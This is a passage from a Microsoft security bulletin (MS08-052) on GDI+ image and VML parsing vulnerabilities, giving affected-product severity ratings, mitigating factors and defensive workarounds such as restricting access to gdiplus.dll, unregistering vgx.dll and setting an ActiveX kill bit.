newer (with higher version numbers) than the files that are currently on your system. For more information on this installation option, see Server Core. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008; see Compare Server Core Installation Options.\r\n\r\nMS08-055 also describes a vulnerability in Microsoft Office XP Service Pack 3. How does MS08-055 relate to this bulletin (MS08-052)?\r\nAs part of the cumulative servicing model for Microsoft Office XP, this security update for Microsoft Office XP Service Pack 3 (KB938464) also addresses the vulnerability described in MS08-055. Users with Microsoft Office XP Service Pack 3 installed will have to install this security update but will only need to install it once.\r\n\r\nI use Microsoft Office 2003 Service Pack 2. Are any additional security features included in this update?\r\nYes, as part of the servicing model for Microsoft Office 2003, when users of Microsoft Office 2003 Service Pack 2 install this update, their systems will be upgraded to security functionality that was initially released with Microsoft Office 2003 Service Pack 3. All updates released after January 1, 2008 for Microsoft Office 2003 Service Pack 2 will include these security features, which were introduced in Microsoft Office 2003 Service Pack 3. We have thoroughly tested this update, but as with all updates, we recommend that users perform testing appropriate to the environment and configuration of their systems. For more information on this issue, please see Microsoft Knowledge Base Article 951646.\r\n\r\nI am a third-party application developer and I use gdiplus.dll in my application. Is my application vulnerable and how do I update it? \r\nDevelopers who redistribute gdiplus.dll should ensure that they update the version of gdiplus.dll installed with their application by downloading the update provided in this bulletin. Developers are encouraged to follow recommended best practices for using a shared component. For more information on best practices on shared component use, please see the Microsoft Knowledge Base Article 835322 on Isolated Applications.\r\n\r\nI am developing software which contains the redistributable file gdiplus.dll. What do I do? \r\nYou should install the security update included in this security bulletin for your development software. If you have redistributed gdiplus.dll with your application, you should issue an updated version of your application to your customers with the updated version of this file included in the download of this security update for your development software.\r\n\r\nIf third-party applications use or install the affected gdiplus.dll component, could I still be vulnerable even after I have installed all required Microsoft security updates? \r\nNo, this security update replaces and re-registers the affected component provided with the operating system. If third party applications follow the recommended best practices for using a shared component as a side-by-side assembly then they are also not affected. Customers are potentially at risk if third party applications do not follow the recommended best practices and instead redistribute an old version of gdiplus.dll with their application. Microsoft Knowledge Base Article 954593 also contains instructions for customers who wish to manually check for the registered affected component. Customers are encouraged to contact their third party solutions developer for additional information.\r\n\r\nWhy does this update address several reported security vulnerabilities? \r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers need to install this update only.\r\n\r\nWhat is GDI+? \r\nGDI+ is a graphics device interface that provides two-dimensional vector graphics, imaging, and typography to applications and programmers.\r\n\r\nWhat is VML? \r\nVector Markup Language (VML) is an XML-based exchange, editing, and delivery format for high-quality vector graphics on the Web that meets the needs of both productivity users and graphic design professionals. XML is a simple, flexible, and open text-based language that complements HTML. For more information on the VML, see the product documentation.\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. To determine the support life cycle for your software release, visit Microsoft Support Lifecycle.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit Microsoft Support Lifecycle. For more information about the extended security update support period for these software versions or editions, visit Microsoft Product Support Services.\r\n\r\nCustomers who require custom support for older releases must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit Microsoft Worldwide Information, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tGDI+ VML Buffer Overrun Vulnerability - CVE-2007-5348\tGDI+ EMF Memory Corruption Vulnerability - CVE-2008-3012\tGDI+ GIF Parsing Vulnerability - CVE-2008-3013\tGDI+ WMF Buffer Overrun Vulnerability - CVE-2008-3014\tGDI+ BMP Integer Overflow Vulnerability - CVE-2008-3015\tAggregate Severity Rating\r\nWindows 2000 and Components\t \t \t \t \t \t \r\n\r\nMicrosoft Internet Explorer 6 Service Pack 1 when installed on Microsoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\n\r\nMicrosoft .NET Framework 1.0 Service Pack 3 when installed on Microsoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft .NET Framework 1.1 Service Pack 1 when installed on Microsoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft .NET Framework 2.0 when installed on Microsoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft .NET Framework 2.0 Service Pack 1 when installed on Microsoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\nWindows XP and Components\t \t \t \t \t \t \r\n\r\nWindows XP Service Pack 2 and Windows XP Service Pack 3\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\n\r\nWindows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\nWindows Server 2003 and Components\t \t \t \t \t \t \r\n\r\nWindows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\nWindows Vista and Components\t \t \t \t \t \t \r\n\r\nWindows Vista and Windows Vista Service Pack 1\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\n\r\nWindows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\nWindows Server 2008 and Components\t \t \t \t \t \t \r\n\r\nWindows Server 2008 for 32-bit Systems*\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2008 for x64-based Systems*\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2008 for Itanium-based Systems\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\nMicrosoft Office Suites\t \t \t \t \t \t \r\n\r\nMicrosoft Office XP Service Pack 3\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Office 2003 Service Pack 2 and Microsoft Office 2003 Service Pack 3\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\n2007 Microsoft Office System and 2007 Microsoft Office System Service Pack 1\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nOther Office Software\t \t \t \t \t \t \r\n\r\nMicrosoft Visio 2002 Service Pack 2\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Office PowerPoint Viewer 2003\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Works 8\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Digital Image Suite 2006\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nSQL Server\t \t \t \t \t \t \r\n\r\nSQL Server 2000 Reporting Services Service Pack 2\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nSQL Server 2005 Service Pack 2\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nSQL Server 2005 x64 Edition Service Pack 2\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nSQL Server 2005 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nDeveloper Tools\t \t \t \t \t \t \r\n\r\nMicrosoft Visual Studio .NET 2002 Service Pack 1\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Visual Studio .NET 2003 Service Pack 1\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Visual Studio 2005 Service Pack 1\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Visual Studio 2008\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Report Viewer 2005 Service Pack 1 Redistributable Package\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nMicrosoft Report Viewer 2008 Redistributable Package\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nMicrosoft Visual FoxPro 8.0 Service Pack 1 when installed on Microsoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Visual FoxPro 9.0 Service Pack 1 when installed on Microsoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Visual FoxPro 9.0 Service Pack 2 when installed on Microsoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Platform SDK Redistributable: GDI+\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\nSecurity Software\t \t \t \t \t \t \r\n\r\nMicrosoft Forefront Client Security 1.0 when installed on Microsoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\n*Windows Server 2008 server core installation not affected. The vulnerabilities addressed by this update do not affect supported editions of Windows Server 2008 if Windows Server 2008 was installed using the Server Core installation option, even though the files affected by these vulnerabilities may be present on the system. However, users with the affected files will still be offered this update because the update files are newer (with higher version numbers) than the files that are currently on your system. For more information on this installation option, see Server Core. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nGDI+ VML Buffer Overrun Vulnerability - CVE-2007-5348\r\n\r\nA remote code execution vulnerability exists in the way that GDI+ handles gradient sizes. The vulnerability could allow remote code execution if a user browses to a Web site that contains specially crafted content. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2007-5348.\r\n\t\r\nMitigating Factors for GDI+ VML Buffer Overrun Vulnerability - CVE-2007-5348\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nThe vulnerability could be exploited by an attacker who convinced a user to open a specially crafted file. There is no way for an attacker to force a user to open a specially crafted file.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for GDI+ VML Buffer Overrun Vulnerability - CVE-2007-5348\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nRestrict access to gdiplus.dll\r\n\r\n1. Run the following commands from an elevated administrator command prompt\r\n\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\Microsoft.NET\Framework\gdiplus.dll') DO cacls %G /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\winsxs\gdiplus.dll') DO cacls %G /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%windir%\Downloaded Program Files\gdiplus.dll^"') DO cacls %G /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles^(86^)%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /P everyone:N\r\ncacls "%programfiles%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Digital Image 2006\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Digital Image 2006\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Works\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Works\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Common Files\Microsoft Shared\VGX\vgx.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Common Files\Microsoft Shared\VGX\vgx.dll" /E /P everyone:N\r\n\r\n2. Restart\r\n\r\nImpact of workaround. Windows Picture and Fax Viewer (on editions prior to Windows Vista) and other applications that rely on GDI+ will not be able to view images. Also, thumbnails in Windows Explorer (on versions prior to Vista) will not display.\r\n\r\nHow to undo the workaround.\r\n\r\n1. Run the following commands from an elevated administrator command prompt\r\n\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\Microsoft.NET\Framework\gdiplus.dll') DO cacls %G /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\winsxs\gdiplus.dll') DO cacls %G /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%windir%\Downloaded Program Files\gdiplus.dll^"') DO cacls %G /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles^(86^)%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /R everyone\r\ncacls "%programfiles%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Digital Image 2006\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Digital Image 2006\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Works\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Works\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\ Common Files\Microsoft Shared\VGX\vgx.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\ Common Files\Microsoft Shared\VGX\vgx.dll" /E /R everyone\r\n\r\n2. Restart\r\n\u2022\t\r\n\r\nUnregister vgx.dll\r\n\r\n1. Click Start, click Run, type "%SystemRoot%\System32\regsvr32.exe" -u "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll", and then click OK.\r\n\r\n2. A dialog box appears to confirm that the un-registration process has succeeded. Click OK to close the dialog box.\r\n\r\nImpact of workaround. Applications that render VML will no longer do so once vgx.dll has been unregistered.\r\n\r\nHow to undo the workaround.\r\n\r\n1. Click Start, click Run, type "%SystemRoot%\System32\regsvr32.exe" "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll", and then click OK.\r\n\r\n2. A dialog box appears to confirm that the registration process has succeeded. Click OK to close the dialog box.\r\n\u2022\t\r\n\r\nPrevent RSClientPrint from running in Internet Explorer\r\n\r\nYou can disable attempts to instantiate RSClientPrint in Internet Explorer by setting the kill bit for the control in the registry.\r\n\r\nWarning If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.\r\n\r\nFor detailed steps that you can use to prevent a control from running in Internet Explorer, see Microsoft Knowledge Base Article 240797. Follow these steps in this article to create a Compatibility Flags value in the registry to prevent RSClientPrint from being instantiated in Internet Explorer.\r\n\r\nPaste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=dword:00000400\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=dword:00000400\r\n\r\nYou can apply this .reg file to individual systems by double-clicking it. You can also apply it across domains by using Group Policy. For more information about Group Policy, visit the following Microsoft Web sites:\r\n\u2022\t\r\n\r\nGroup Policy collection\r\n\u2022\t\r\n\r\nWhat is Group Policy Object Editor?\r\n\u2022\t\r\n\r\nCore Group Policy tools and settings\r\n\r\nNote You must restart Internet Explorer for your changes to take effect.\r\n\r\nImpact of workaround. There is no impact as long as the object is not intended to be used in Internet Explorer.\r\n\r\nHow to undo the workaround.\r\n\r\nPaste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=-\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=-\r\n\r\nYou can apply this .reg file to individual systems by double-clicking it. You can also apply it across domains by using Group Policy. For more information about Group Policy, visit the following Microsoft Web sites:\r\n\u2022\t\r\n\r\nGroup Policy collection\r\n\u2022\t\r\n\r\nWhat is Group Policy Object Editor?\r\n\u2022\t\r\n\r\nCore Group Policy tools and settings\r\n\r\nNote You must restart Internet Explorer for your changes to take effect.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for GDI+ VML Buffer Overrun Vulnerability - CVE-2007-5348\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by a heap-based buffer overrun when GDI+ improperly processes gradient sizes handled by the vector graphics link library.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker could take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the Web site. This can also include compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or in an Instant Messenger request that takes users to the attacker's Web site. It could also be possible to display specially crafted Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user is logged on and reading e-mail messages or is visiting Web sites for any malicious action to occur. Therefore, any systems where e-mail messages are read or where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability. Systems that are not typically used to visit Web sites, such as most server systems, are at a reduced risk.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? 